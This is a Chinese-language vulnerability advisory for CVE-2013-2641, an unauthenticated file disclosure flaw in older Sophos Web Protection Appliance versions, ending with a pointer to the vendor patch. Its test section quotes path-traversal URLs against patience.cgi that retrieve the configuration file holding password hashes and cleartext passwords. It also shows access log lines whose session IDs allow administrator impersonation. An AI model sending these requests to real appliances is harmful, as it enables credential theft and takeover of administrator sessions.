发布日期:2013-04-03
更新日期:2013-04-08
受影响系统:
Sophos Web Protection Appliance
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58833
CVE(CAN) ID: CVE-2013-2641
Sophos Web Security and Control 在网关处阻止网页数据流中的恶意程序、间谍软件、钓鱼,匿名代理和其他流氓程序。
Web Protection Appliance 3.7.8.2及之前版本存在任意文件泄露漏洞,攻击者可利用这些漏洞泄露设备上下文内的任意文件。
<*来源:Wolfgang Ettlinger
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Unauthenticated local file disclosure (CVE-2013-2641)
As an example, an unauthenticated user can download the configuration file
containing the salted hash of the administrator password as well as clear text
passwords e.g. for FTP backup storage or Active Directory authentication:
https://www.example.com/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00
Furthermore the Apache access log can be retrieved. As PHP session IDs are
passed via the URL rather than via Cookies, these can be found in this log
file and effectively used to impersonate administrator users:
https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00
An excerpt from the log file shows that it contains PHP session ID information
(parameter "STYLE").
<host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139
"https://www.example.com/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
建议:
--------------------------------------------------------------------------------
厂商补丁:
Sophos
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: